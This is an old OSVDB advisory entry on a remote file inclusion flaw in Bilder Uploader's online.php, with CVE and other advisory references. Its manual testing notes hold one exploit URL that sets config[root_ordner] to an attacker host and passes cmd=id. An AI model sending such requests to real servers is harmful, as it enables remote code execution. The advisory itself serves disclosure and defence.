Bilder Uploader online.php config[root_ordner] Variable Remote File Inclusion

2007-08-09T00:00:00
ID OSVDB:36447
Type osvdb
Reporter Rizgar(rizgar@linuxmail.org)
Modified 2007-08-09T00:00:00

Description

Manual Testing Notes

http://[target]/path/online.php?config[root_ordner]=http://[attacker]?&cmd=id

References:

Secunia Advisory ID:26399 Related OSVDB ID: 36446 Related OSVDB ID: 36444 Related OSVDB ID: 36443 Related OSVDB ID: 36445 Related OSVDB ID: 36448 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-08/0113.html ISS X-Force ID: 35922 FrSIRT Advisory: ADV-2007-2836 CVE-2007-4326